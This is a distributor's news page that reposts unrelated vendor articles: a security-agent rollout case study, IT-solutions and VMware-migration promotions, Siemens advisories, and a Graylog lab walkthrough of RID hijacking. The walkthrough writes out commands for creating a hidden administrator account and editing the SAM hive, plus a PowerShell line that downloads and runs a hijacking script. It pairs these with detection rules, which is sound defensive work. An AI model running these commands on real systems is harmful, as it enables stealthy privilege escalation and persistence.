2025-02-24 - Version 2 Limited

Fortune 100 Company Successfully Deploys dope.security on 18k+ Devices in Record Time

Deploying a security tool at any company is not straightforward. It’s a balancing act that requires the right combination of product stability, technical integrations, skilled personnel on both sides, and many other variables. This becomes increasingly more challenging if you are a large enterprise customer.

‍

These are just a few of the challenges that can come up:

1. Customization and Integration Requirements

Tailored Needs

Each organization has unique security requirements, so off-the-shelf tools often need heavy customization to meet specific needs. Enterprises can have several pre-existing security tools and general applications in both cloud and hybrid environments, making it necessary to integrate new incoming tools with these existing SIEM systems, firewalls, VPNs, and more. For example, part of this integration could be setting up SSL Inspection bypasses for certain applications or changing computer networking paths so that they don’t break a VPN.

‍

2. Resource and Expertise Constraints

Limited Security Personnel

Legacy systems can be complex to deploy and manage on an ongoing basis and, therefore, require a dedicated team. Not all organizations can afford or have the existing team hierarchy to support this. This can make large-scale deployments, especially in enterprises with thousands of employees, expensive from a time and cost perspective. Since most legacy tools are too complex, organizations must invest in dedicated teams around the globe to maintain them or hire expensive third-party services to run the deployment.

‍

3. Maintenance and Continuous Updating

Frequent Updates

Cybersecurity tools require regular updates to stay effective against external threats and meet internal needs. Manually coordinating these with the company through phased deployments, auto upgrades, and uploads into tools like InTune can be tough and time-consuming. Within the tool itself, slow feedback on configurations can drastically slow down deployments. These configurations can include things like policy updates. Legacy tools have a polling mechanism that takes 30 minutes to an hour to pull the latest policy down from the cloud. This means longer wait times for updates to take effect.

‍

4. Re-work when moving from POC to Production

Non-Production Trials

Most cybersecurity POC environments are shut down after the trial. After purchase, the customer receives a completely fresh production tenant to be re-configured to fit the environment. It can be frustrating, as all work to date is thrown away, including SSO configs, policies, and more.

How does dope.security handle these challenges?

dope.security enabled a Fortune 100 customer to deploy the dope agent at an average of 3,000 devices per week and grow from 900 devices to over 18,000 devices in a matter of weeks by focusing on four key areas.

‍

1. Product Stability

dope.security has built an on-device SSL proxy that performs all SWG capabilities on the user’s laptop—URL Filtering, Cloud App Controls, SSL Inspection, and more. This refreshed architecture, which removes the need for backhauling data to a remote data center, makes dope.swg the most reliable and stable proxy available regardless of the state, country, or office you’re in. The Fly-Direct Architecture also makes policy configurations very stable, consistent, and fast, which is critical during deployments. Updating policies in real-time at the individual and group levels makes the entire rollout process much more efficient and quicker. It also ensures the right security policies are applied to the correct individuals instantly.

‍

2. Deployment Experience

Deploying the dope.security agent is extremely easy whether you’re installing 200 or 20,000 devices because there is no manual configuration or customization a customer has to make before installing.

In this specific case, the customer easily deployed InTune silently across their organization. Because no extra configuration was required after the agent was installed, the customer instantly blocked malicious websites and traffic across their deployed devices. Our clear guide to InTune deployments clarified any frequently asked questions.

The entire process from the initial free production trial was one click without excessive help from the dope security team. After purchase, the same trial was converted into a paid account—no additional configuration was required.

‍

3. Global Technical Support Team

First, dope.security focuses on building strong relationships with the customer implementation team. This means having regular check-ins either through status calls, dedicated Slack channels, or email. Regular check-ins ensure that no bug or deployment hurdle goes unnoticed.

Second, the dope.security technical team consists only of product engineers who have in-depth knowledge of the product and how it works. There are no generic Tier 1 support agents whose only job is to escalate a customer to the next tier for assistance. This means the technical support team can answer any question in real time, dramatically increasing the productivity and speed of resolving issues.

‍

4. SSL Error Notifications

A very common issue with proxy deployments is errors due to SSL Inspections breaking applications. Typically, the process to fix this is to implement a bypass rule. But with most SWG providers, this is extremely manual and not straightforward.

dope.security simplified this and built an SSL notification feature. The dope agent identifies and reports when it has broken traffic due to SSL cert pinning. It allows the admin to view these SSL errors in the dope console and easily create either application or domain bypasses in a few clicks. This feature is unique to dope.security, enabling deployments to move much quicker as admins don’t need to spend time manually hunting for why specific applications are breaking and their associated domains, URLs, or extensions to create bypass lists. dope.security automatically identifies, reports, and provides the data you need directly in the console.

dope.security enabled a Fortune 100 customer to deploy the dope agent at an average of 3,000 devices per week and grow from 900 devices to over 18,000 devices in a matter of weeks

This Fortune 100 customer rollout is just one case that shows how dope.security has redefined cybersecurity deployments. It no longer needs to be an extremely long, arduous process that requires tons of resources, time, and effort. From initial onboarding to ongoing maintenance of the deployment, dope.security makes everything much simpler through product stability, understanding customer needs, and providing dedicated, knowledgeable support.

About Dope Security
A comprehensive security solution designed to protect individuals and organizations from various cyber threats and vulnerabilities. With a focus on proactive defense and advanced technologies, Dope Security offers a range of features and services to safeguard sensitive data, systems, and networks.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Dope Security 2025

IT Solutions: How companies benefit from them

What are IT solutions?

“That’s the solution!” is how an IT solution should ideally feel. It should solve an existing problem, lead to process optimization or ensure efficient target achievement.

On the technical side, this includes the following:

software
hardware
data
infrastructure, and
security mechanisms.

On a qualitative level, these factors include:

consulting
integration
support, and
other services, as necessary.

Examples include ERP systems, cloud services, IT security solutions, databases, communication platforms and automation tools.

IT solutions: Definition

An IT solution is a comprehensive approach that goes beyond the mere application of software. It combines components such as hardware, infrastructure, services, integration, support or consulting. It is often individually tailored to a company in order to meet its specific needs.

An IT solution is different from software because it is a complex concept. It may comprise several software products and other elements.
Tobias Kortas

What types of problems are solved?

In the corporate world, there are countless problems and opportunities to use information technology in a meaningful way. It is important that an IT solution brings peace of mind to business owners.

IT solutions: Examples

The following examples use specific categories to illustrate the types of IT solutions available. Each type addresses specific requirements in companies or organizations.

Example #1: Information centralization

These include solutions such as ERP, CRM and HR systems. These are comprehensive, scalable IT solutions that meet the complex requirements of large companies. They integrate various systems and processes, such as financial management, customer relationship management (CRM) or human resources (HR). One of the aims is to manage data centrally and optimize company-wide processes.

Example #2: Data management

Data management solutions help companies organize, store, protect and analyse data effectively and purposefully. In the best case scenario, better decisions can be made based on this and processes can be sensibly revised.

Example #3: Increased IT security

Protecting systems and networks from threats such as hacker attacks or malware is of fundamental importance. The spectrum ranges from firewalls, encryption, analysis and incident identification to comprehensive protection of sensitive company data through an Information Security Management System (ISMS).

Example #4: Communication and collaboration

In the modern corporate world, business has changed. Remote work and large geographical distances are now the norm. Team members must communicate with each other and external parties in a targeted manner.

By using the right communication and collaboration platforms a strong culture is developed. This also improves the quality of collaboration.

Example #5: Automation and AI

Artificial intelligence (AI) and process automation lead to better outputs. For example, companies benefit from AI chatbots for support or use machine learning for better workflows. The list of benefits of artificial intelligence is long. Related solutions should always should always focus on the practical benefits.

Example #6: E-commerce

An e-commerce solution supports companies in setting up and operating online stores. It includes functions such as product management, payment processing, ordering processes and marketing tools. An important goal is to offer customers a seamless shopping experience.

Example #7: Industry-specific solutions

An industry-specific IT solution optimizes processes according to specific requirements. Examples of this include electronic patient records in the healthcare sector or trading systems in the financial sector. In most cases, the aim is to be competitive within one’s own industry or to offer clients a good service.

Application in large companies

Large companies (enterprises) usually have complex IT environments. Each department usually has its own requirements, prerequisites and success metrics.

Needless to say, solutions must cover a wide range of application scenarios. Selected systems must have a wide range of functionalities, be highly scalable and integrate easily.

Examples of enterprise solutions include:

ERP systems – for managing business processes
CRM tools for customer relationship management or
Data analysis solutions such as business intelligence platforms.

Use in small and medium-sized enterprises (SMEs)

Large companies tend to focus on goals such as process optimization, greater security or staying ahead of the competition. In contrast, small and medium-sized enterprises are increasingly focusing on factors such as:

cost savings,
process digitalization and
diving growth.

These require effective solutions that deliver as much performance as possible at the lowest possible cost. They must also be scalable to support the business as it grows.

Typical IT solutions for SMEs may include:

Cloud-based business software such as Microsoft 365,
Collaboration tools such as Slack or Trello, or
CRM systems such as HubSpot.

However, IT security also plays an important role here. And, depending on their model, e-commerce solutions, such as web store services, may be practical.

Customized IT solutions

It’s like clothing: Tailor-made fits best.

IT service providers can develop options that are individually tailored to specific company needs. These are highly beneficial when there are unique business processes for which a standard offering is not sufficient. For example, automation of a unique business process may be developed individually.

Of course, a cost-benefit analysis would reveal whether this is possible. In commercial terms, the ROI must be calculated before such a project begins.

Sometimes, these are created in-house. These can be helpful as an interim answer. This gives room for advance planning that will support the longer-term business goals.

Tip: Since customized solutions also mean a high cost factor, it is advisable to choose an IT solution that can be easily adapted to individual needs and requirements.
Tobias Kortas

What does your business need today?

When investing in a new solution, it should deliver on an overarching benefit. Examples may be better service provision, reliable security or concrete time savings.

Below are some key benefits to consider.

1. Greater efficiency

Companies strive for productive and effective work. They also aim for the best possible results with the least possible effort – efficiency. In concrete terms, optimizing or automating processes can save a lot of time, money and resources. At the same time, optimized processes lead to better results.

2. Increased customer satisfaction

The customer is king. Companies depend on the loyalty of their customers. By using the right tools, processes and training customer satisfaction increases.

An example of using a solution would be improving communication or enabling personalized services and quick responses to inquiries. A self-service portal, for example, can guide customers quickly to the answers they are looking for.

3. Competitive advantage

The right IT solution helps companies gain valuable advantages over the competition. For example, automated processes or targeted workflow management can lead to faster and more cost-effective work. AI and IoT technologies also make it possible to develop new products, services or business models,

4. More security and compliance

The right IT solutions lead to better security in a variety of ways. Examples include data encryption, access controls, backups and restores.

Professional device management – the proper administration of various devices – also provides effective protection against unauthorized access or data loss.

In addition, the right IT solutions support compliance with legal requirements, which is particularly important in highly regulated industries.

5. Better decision-making

IT can pave the way for clarity and documentation of data that drives better decisions.

Data can “nudge” targeted user behavior. Applications such as AI-based summaries can provide a quick overview of complex processes. This means a quick decision about the next step can be made.

Remember: the cost-benefit ratio must be right

IT solutions offer many other solutions too. Examples include an optimized user experience, 24/7 service and cost savings through proven IT solution providers.

But, it is crucial that the cost-benefit ratio is high. Companies should have clarity on how they will benefit from selected solutions. Where this can vary greatly from company to company, steps such as a company-specific selection makes sense.

Solving customer problems

OTRS offers customized IT solutions that can be used for many different purposes across all industries. Through good adaptability, fast implementation and reliable local support OTRS customers solve a vast number of operational problems.

Often addressed areas in which OTRS Group works, include:

Conclusion: Apply technology for success

If you have a problem, you should look for a suitable solution as quickly as possible – and find it. This is no different in IT. The subtle difference is that IT often forms the basis for a company’s success.

It is important to point out the difference between pure software and an IT solution. A solution solves a business problem by using software, services, processes and more.

Users benefit from the focus on finding benefit-oriented answers to their problems. This includes options that improve upon processes and workflows, security and data-driven – decisions.

Find out how you can best benefit from OTRS IT solutions.

About OTRS

OTRS (originally Open-Source Ticket Request System) is a service management suite. The suite contains an agent portal, admin dashboard and customer portal. In the agent portal, teams process tickets and requests from customers (internal or external). There are various ways in which this information, as well as customer and related data can be viewed. As the name implies, the admin dashboard allows system administrators to manage the system: Options are many, but include roles and groups, process automation, channel integration, and CMDB/database options. The third component, the customer portal, is much like a customizable webpage where information can be shared with customers and requests can be tracked on the customer side.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users

Researchers at AhnLab Security Intelligence Center (ASEC) recently published a report on the Andariel threat group, a DPRK state-sponsored APT active for over a decade, that has been leveraging RID hijacking and user account concealment techniques in its operations to stealthily maintain privileged access to compromised Windows systems.

This blog post explores hands-on how RID hijacking and hidden backdoor accounts work in Andariel’s attack chain, and how Graylog Security can be used to detect and analyze similar activity in an organization’s network.

What is RID Hijacking?

The RID, or Relative Identifier, uniquely identifies a user in Windows as part of its Security Identifier (SID). When a user logs on, the system retrieves the SID for that user from the local Security Account Manager (SAM) database and places it in the user’s access token to identify it in subsequent interactions. The local Administrator account RID is always 500, and standard user RIDs usually start at 1001.

RID hijacking is a technique discovered by Sebastian Castro that involves modifying the RID value of a low-privileged account to match the value of a privileged account such as local Administrator by manipulating the SAM database. As a result, the operating system mistakenly grants elevated privileges to the originally restricted account, allowing the attacker to execute privileged commands as that user.

This technique is particularly stealthy because the activity in event logs will still be associated with the low-privilege user and there is often less scrutiny applied to standard accounts.

However, there is a caveat to the technique – it requires SYSTEM level privileges to access and modify user information in the SAM, which resides in a protected registry key.

Attack Demonstration

According to the report from AhnLab, the threat actor’s RID hijacking process consists of the following stages. We’ll use this model as we walk through the attack in a lab environment.

The RID Hijacking attack process referenced from AhnLab

Our lab consists of a Windows 10 Enterprise system with auditing enabled for process execution (command line included), account logon and management, registry, and SAM access. Script block logging is also turned on.

System, Security, and PowerShell/Operational event logs are sent via Winlogbeat to a Graylog Enterprise 6.0.1 instance with Illuminate 6.1 installed to enable parsing and enrichment.

Stage 1: SYSTEM Privilege Escalation

We’ll assume initial access to the Windows system and start off with an elevated admin user. However, in order to access the SAM registry hive, we need SYSTEM. To do this, we can use exploits like JuicyPotato or tools like PsExec, a Microsoft Sysinternals tool often abused by adversaries for lateral movement and privilege escalation. We’ll spawn a PowerShell session using PsExec with the -s argument:

PsExec.exe -s -i powershell.exe

The output of whoami /user in the shell confirms that we’re now running as SYSTEM.

In Graylog, we can see a common indicator of Sysinternals PsExec activity, Event ID 7045 Remote Service Creation with the default service name PSEXESVC. Following the subsequent events (ordered bottom to top) we see our whoami command executed as Local System.

Stage 2: Create User Account

Having obtained SYSTEM, the adversary proceeded to create a hidden local user account and add it to privileged groups. These are the commands used:

net user admin$ admin@123 /add
net localgroup “Remote Desktop Users” “admin$” /add
net localgroup “Administrators” “admin$” /add

The trick to hiding the user here is the $ at the end of the username. It’s an old school technique that imitates computer accounts which are hidden from some user listing options – note that the newly created user isn’t shown in the output of net user.

In Graylog we see the commands as event ID 4688 labeled as “process started”, and additional labels for 4720 “account created” and 4732 “group member added”.

Stage 3: Modify the RID Value in Registry

Before demonstrating the RID hijack, let’s see what the current RID value and permissions are for the user admin$. We’ll open a separate command prompt and spawn a shell as that user using runas:

runas /user:admin$ cmd

Then, execute whoami commands in that shell. As shown, the user’s current RID is 1009 and its privileges are limited as expected for a standard user.

Well, as the chefs say, elevate it!

Back to the PowerShell session as SYSTEM, we can run regedit.exe to open the GUI registry editor in the same privilege context.

User information is stored in the SAM hive in unique subkeys under:

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

Each subkey corresponds to an account where the key name is the hexadecimal representation of the decimal user RID. The value 1009 for admin$ translates to 0x3F1, so we’re looking at the key 000003F1.

Within key 000003F1 the actual RID can be found in the value F which contains binary data. As highlighted, the RID value is located at offset 30 and stored in little-endian format.

To execute the hijack, we need to overwrite this value with the local Administrator RID of 500 (0x1F4) converted to little-endian as shown below.

With that modification, admin$ should now be given the elevated RID 500 upon logon. If we open a new command prompt as the user and run whoami /user, we see the new hijacked RID, though the rest of the SID stays unchanged. Running whoami /priv shows that the user has been granted admin privileges.

We can hunt in Graylog for activity associated with non-Administrator accounts that have the RID 500 using the following query:

NOT user_name:administrator AND user_id:/.*\-500/

This query might result in false positives if the administrator account is renamed. We can further specify it to target both RID hijacking and user accounts mimicking machine names.

user_name:/.*\$/ AND user_id:/.*\-500/

Custom and Open-source Tooling

AhnLab Report

Manually altering SAM user information in the registry editor is good for demonstration, but it isn’t necessarily what threat actors are doing.

The AhnLab report details that Andariel utilized two distinct custom tools to automate the RID hijacking attack process. One of the tools named CreateHiddenAccount is open-source and available on GitHub.

AhnLab breaks down the differences between the tools quite well in its report:

CreateHiddenAccount is particularly interesting since it can work without SYSTEM privileges. It still needs access to the SAM registry key, so it employs the Windows CLI program regini to edit the registry through a .ini file. The file contains parameters to open up the SAM registry key access permissions to allow modification with administrator privileges.

Let’s execute the CreateHiddenAccount tool in a fresh Graylog lab to see what events are produced. First, download the UPX packed variant to the Windows host.

certutil.exe -urlcache -split -f https://github.com/wgpsec/CreateHiddenAccount/releases/download/0.2/CreateHiddenAccount_upx_v0.2.exe CreateHiddenAccount_upx_v0.2.exe

The command line arguments require the hidden user to create (the $ is appended automatically) and the target user whose RID will be cloned. Here, we’re again creating the user admin$ and targeting the local admin RID.

CreateHiddenAccount_upx_v0.2.exe -u admin -p admin@123 -cu Administrator

The tool produces some interesting events to analyze in Graylog. Directly after execution we see regini.exe being used to modify the access control rules of the SAM registry key.

Following that is a flurry of user enumeration events and account creation for admin$. Interestingly, we see the tool deleting the hidden user then silently importing a .reg file using regedit. What’s happening here is that the tool already populated the import file with information from the user registry key before it was deleted, and modified the RID in the file to match Administrator’s. This is an additional step to hide the created user as once the registry key is restored, the user becomes hidden from additional user list interfaces.

Those with their detection hat on might notice that the filenames are notably unique and static throughout the tool execution. These names are actually hardcoded in the source code, seen in the function below.

This presents an opportunity to detect CreateHiddenAccount execution via child process command lines where the unique filenames are present. Note though that this is considered a brittle detection – while it can reliably identify this particular version of CreateHiddenAccount unmodified, it is trivial for the adversary to change these filenames in the source before compiling to an executable.

Nonetheless, it’s useful in a threat hunt or to detect the vanilla tool. We can use the following query:

process_command_line:(/.*N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8\.ini/ OR /.*sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko\.reg/)

The tool by itself doesn’t do much in the way of behavior obfuscation or sandbox evasion. Querying its hash on VirusTotal returns some damning results.

Further Attempts to Hide Users

In addition to hiding the backdoor user account with a username ending in $, the custom tool used by Andariel attempts to further conceal the account through deletion and registry import operations. We analyzed a similar feature in CreateHiddenAccount, but now we’ll carry out the technique separately and see what can be gleaned from the logs.

As demonstrated below, we repeat the steps of SYSTEM privilege escalation and hidden user account creation, but this time we run a PowerShell download cradle to fetch and execute in-memory a RID hijacking script from GitHub. This leaves us with the account given administrator privileges without further action to conceal it.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/r4wd3r/RID-Hijacking/master/Invoke-RIDHijacking.ps1'); Invoke-RIDHijacking -User 'admin$' -RID 500

Graylog Illuminate captures the PowerShell script execution and even extracts the SAM registry key path being modified for RID hijacking.

Even with the fake computer name, the hidden user still shows up in Computer Management.

Following along with the Andariel threat group’s tool methods, we run commands to:

A) Fetch the hidden user’s RID

Get-WmiObject Win32_UserAccount | Where-Object { $_.Name -eq 'admin$' } | Select-Object Name, SID

B) Export the hidden user’s associated registry keys in the SAM hive

reg export hklm\sam\sam\domains\account\users\names\admin$ names.reg

reg export hklm\sam\sam\domains\account\users\0000XXXX users.reg

C) Delete the user

net user admin$ /delete

D) Restore the user by importing the registry files containing the user keys information

reg import names.reg

reg import users.reg

By using this method, admin$ is no longer displayed in Computer Management, at least until a system reboot.

Every step of the execution can be seen in Graylog.

Detections

We’ve provided Sigma rules below to detect the following aspects of the attack chain:

Hidden user account with Administrator RID
RID hijacking via CreateHiddenAccount
Export of SAM users registry keys via reg.exe

With Graylog Security, we can manually add these rules and configure timed search intervals to detect the activity in our log ingest.

The Sigma engine in Graylog provides an option to search the logs using the detector before deployment. This way you can also see the exact search query the rule translates to.

Rule #1

title: Illuminate - Hidden User Account With Administrator RID
id: 531bfab7-d18c-4f51-bae0-64cf38cae3d5
status: experimental
description: Detects special privileges assigned to a hidden account manipulated with admin RID hijacking
references:
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.privilege-escalation
    - attack.t1078
    - attack.persistence
    - attack.t1098
logsource:
    product: windows
    service: security
detection:
    selection_event:
        EventID: 4672
    selection_name:
        SubjectUserName|endswith: '$'
    selection_rid:
        SubjectUserSid|endswith: '-500'
    condition: all of selection*
falsepositives:
    - Unknown
level: high

Rule #2

title: Illuminate - RID Hijacking Via CreateHiddenAccount
id: 8b8fdf38-4e34-4d7b-bdaa-b3b9920fb80b
status: experimental
description: Detects the open-source tool CreateHiddenAccount (unmodified) used by Andariel threat group for RID hijacking
references:
    - https://github.com/wgpsec/CreateHiddenAccount/
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.privilege-escalation
    - attack.t1078
    - attack.persistence
    - attack.t1136.001
    - attack.t1098
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8'   # regini .N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8.ini
            - 'sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko'    # regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg
    condition: selection
falsepositives:
    - Unknown
level: high

Rule #3

title: Illuminate - Export of SAM Users Registry Keys Via Reg.exe
id: 0709625a-4703-47ba-acfd-3beaa4d0f1dc
status: experimental
description: Detects export of SAM user account information via reg export
references:
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.credential_access
    - attack.t1003.002
    - attack.persistence
    - attack.t1098
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'export'
            - 'hklm\sam\sam\domains\account\users\'
    condition: selection
falsepositives:
    - Administrative scripts or forensic investigations
level: high

Graylog Detections

Graylog has provided the Sigma Rules here to share threat detection intelligence with those not running Graylog Security. Note that Graylog Security customers receive a content feed including Sigma Rules, Anomaly Detectors, and Dashboards, and other content to meet various security use cases. For more about Sigma Rules, see our recent blog “The Ultimate Guide to Sigma Rules”

To learn how Graylog can help you improve your security posture, contact us today or watch a demo.

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Graylog 2025

Modernized VMware Migration: How Scale Computing Eases the Move

Scale Computing Executive Spotlight: VMware Migration

Migrating away from VMware can seem overwhelming, with fears of complexity and downtime creating uncertainty about where to start and how to proceed. But it doesn’t have to be that way. In our latest video, Scale Computing CEO Jeff Ready explains how our entire team has spent years perfecting the migration process, ensuring that customers enjoy a smoother, simpler path to IT modernization.

For many organizations, the first hurdle in considering a VMware alternative is the migration process itself. Will it integrate with our existing infrastructure and tools? What about the ecosystem of backup and security software tied to VMware? As Jeff explains, Scale Computing has been tackling these challenges for years, long before Broadcom’s acquisition of VMware. Armed with the right tools and the infrastructure experts at the ready to ensure a seamless and efficient transition, we’re here to help guide you through every step of your migration journey.

Scale Computing’s tailored approach ensures that each migration is optimized for each customer’s unique environment. Jeff further explains how Scale Computing leverages a diverse set of tools and methodologies across a broad spectrum of use cases to successfully migrate practically every type of application from VMware to the SC//Platform. The collective expertise of our team ensures that our customers and partners can be fully confident that their workloads will transition smoothly and that their IT systems will remain resilient both during and after the move.

However, what really makes Scale Computing stand out from the crowd isn’t just our migration expertise, but SC//Platform itself. Unlike VMware, which was developed decades ago, Scale Computing continues to actively invest in the latest groundbreaking automation and AI technologies into its solutions. As one of the top five VMware alternatives recommended by DCIG, Scale Computing offers not just a replacement but a significant upgrade that enables organizations to reduce complexity, enhance performance, and future-proof their IT operations.

If you’ve been considering moving away from VMware but are wary of the potential complications, it’s time to rethink what’s possible. Watch the full video to hear Jeff explain how Scale Computing delivers a seamless, stress-free migration experience and why we’re recognized as a leader in VMware alternatives.

About Scale Computing
Scale Computing is a leader in edge computing, virtualization, and hyperconverged solutions. Scale Computing HC3 software eliminates the need for traditional virtualization software, disaster recovery software, servers, and shared storage, replacing these with a fully integrated, highly available system for running applications. Using patented HyperCore™ technology, the HC3 self-healing platform automatically identifies, mitigates, and corrects infrastructure problems in real-time, enabling applications to achieve maximum uptime. When ease-of-use, high availability, and TCO matter, Scale Computing HC3 is the ideal infrastructure platform. Read what our customers have to say on Gartner Peer Insights, Spiceworks, TechValidate and TrustRadius.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Scale Computing scale computing news 2025

How to find Siemens devices on your network

Multiple vulnerabilities (February 2025)

Siemens disclosed multiple vulnerabilities in various product lines:

SSA-111547 – cleartext storage of sensitive information in SIPROTEC 5 (CVSS score 5.1)
SSA-195895 – user enumeration vulnerability in the web server of SIMATIC Products (CVSS score 6.9)
SSA-224824 – denial of service vulnerabilities in SIMATIC S7-1200 CPU Family before V4.7 (CVSS score 8.7)
SSA-246355 – multiple vulnerabilities in Tableau Server Component of Opcenter Intelligence before V2501 (CVSS score 10.0)
SSA-342348 – insufficient session expiration vulnerability in Siemens SIMATIC PCS neo, TIA Administrator, and TIA Portal (CVSS score 8.7)
SSA-687955 – accessible development shell via physical interface in SIPROTEC 5 (CVSS score 7.0)
SSA-698820 – multiple vulnerabilities in FortiGate NGFW before V7.4.4 on RUGGEDCOM APE1808 devices (CVSS score 9.0)
SSA-767615 – information disclosure via SNMP in SIPROTEC 5 devices (CVSS score 8.7)
SSA-769027 – multiple vulnerabilities in SCALANCE W700 IEEE 802.11ax devices before V3.0.0 (CVSS score 8.6)
SSA-770770 – multiple vulnerabilities in FortiGate NGFW before V7.4.5 on RUGGEDCOM APE1808 devices (CVSS score 7.5)

What is the impact?

The disclosed vulnerabilities range in severity. For the most critical vulnerabilities, unauthenticated remote attackers could execute arbitrary code and completely take over a vulnerable system. Successful exploitation of other disclosed vulnerabilities could result in denial-of-service conditions, disclosure of sensitive information, or access to the underlying filesystem.

Are updates or workarounds available?

For the disclosed vulnerabilities, Siemens has released updates or patches. Siemens recommends that access is restricted to trusted sources. Refer to Siemens’ website for more information about their operational guideline recommendation.

How to find potentially vulnerable systems

From the Asset Inventory, runZero users applied the following query to locate systems running potentially vulnerable software:

hw:"SCALANCE M8" OR hw:"SIMATIC" OR hw:"RUGGEDCOM" OR hw:"SCALANCE"

Ten vulnerabilities disclosed in Siemens products (December 2024)

Siemens disclosed ten vulnerabilities in a variety of Siemens products, including their RUGGEDCOM, SENTRON, and other product lines. These vulnerabilities have CVSS scores that range from 5.1 (moderate) to 8.6 (high). The disclosed vulnerabilities range in severity. For the most the critical vulnerabilities, unauthenticated remote attackers could perform unauthorized administrative actions if they are able to get a local user to click on a malicious link. Successful exploitation of other disclosed vulnerabilities could result in denial-of-service conditions or disclosure of sensitive information. Siemens has released updated patches for these vulnerabilities. Siemens also recommends that all systems be kept behind firewalls and have unnecessary services disabled.

How to find potentially vulnerable systems

From the Asset Inventory, use the following query to locate systems running potentially vulnerable software:

vendor:Siemens

Multiple vulnerabilities (November 2024)

Siemens disclosed multiple vulnerabilities in various product lines:

SSA-354112 – multiple vulnerabilities in SCALANCE M-800 Family devices (CVSS score 8.6)
SSA-654798 – unauthenticated remote access to the filesystem in SIMATIC CP devices (CVSS score 8.7)
SSA-454789 – deserialization of untrusted data in TeleControl Server (CVSS score 10.0)

What is the impact?

The disclosed vulnerabilities range in severity. For the most critical vulnerabilities, unauthenticated remote attackers could execute arbitrary code and completely take over a vulnerable system. Successful exploitation of other disclosed vulnerabilities could result in denial-of-service conditions, disclosure of sensitive information, or access to the underlying filesystem.

Are updates or workarounds available?

For the disclosed vulnerabilities, Siemens has released updates or patches. Siemens recommends that access is restricted to trusted sources. Refer to Siemens’ website for more information about their operational guideline recommendation.

How to find potentially vulnerable systems

From the Asset Inventory, runZero users applied the following query to locate systems running potentially vulnerable software:

hw:"SCALANCE M8" OR hw:"SCALANCE S615" OR hw:"SIMATIC CP" OR (os:"Windows" AND tcp_port:26865)

35 vulnerabilities (September 2024)

Siemens disclosed 35 vulnerabilities in a variety of Siemens products, including their LOGO!, SIMATIC, SINEMA, and other product lines. These vulnerabilities have CVSS scores that range from 4.3 (moderate) to 10 (extremely critical). The most critical vulnerabilities disclosed include:

SSA-955858 – multiple vulnerabilities in LOGO! 8 BM devices (CVSS score 9.8)
SSA-832273 – multiple vulnerabilities in RUGGEDOM devices (CVSS score 9.8)
SSA-721642 – multiple vulnerabilities in SCALANCE devices (CVSS score 9.1)
SSA-673996 – multiple vulnerabilities in SICAM and SITIPE devices (CVSS score 8.2)
SSA-629254 – remote code execution vulnerability in SIMATIC SCADA and PCS 7 systems (CVSS score 9.1)
SSA-455250 – multiple vulnerabilities in RUGGEDCOM devices (CVSS score 9.8)
SSA-039007 – heap-based buffer overflow in the Siemens User Management Console component (CVSS score 9.8)

The disclosed vulnerabilities range in severity. For the most critical vulnerabilities, unauthenticated remote attackers could execute arbitrary code and completely take over a vulnerable system. Successful exploitation of other disclosed vulnerabilities could result in denial-of-service conditions or disclosure of sensitive information. For most of the disclosed vulnerabilities, Siemens has released updates or patches. However, some vulnerabilities mentioned above, including some critical vulnerabilities, do not have patches released and it is unclear when such updates would be available. Siemens recommends that all systems be kept behind firewalls and have unnecessary services disabled.

How to find potentially vulnerable systems

From the Asset Inventory, use the following query to locate systems running potentially vulnerable software:

vendor:Siemens

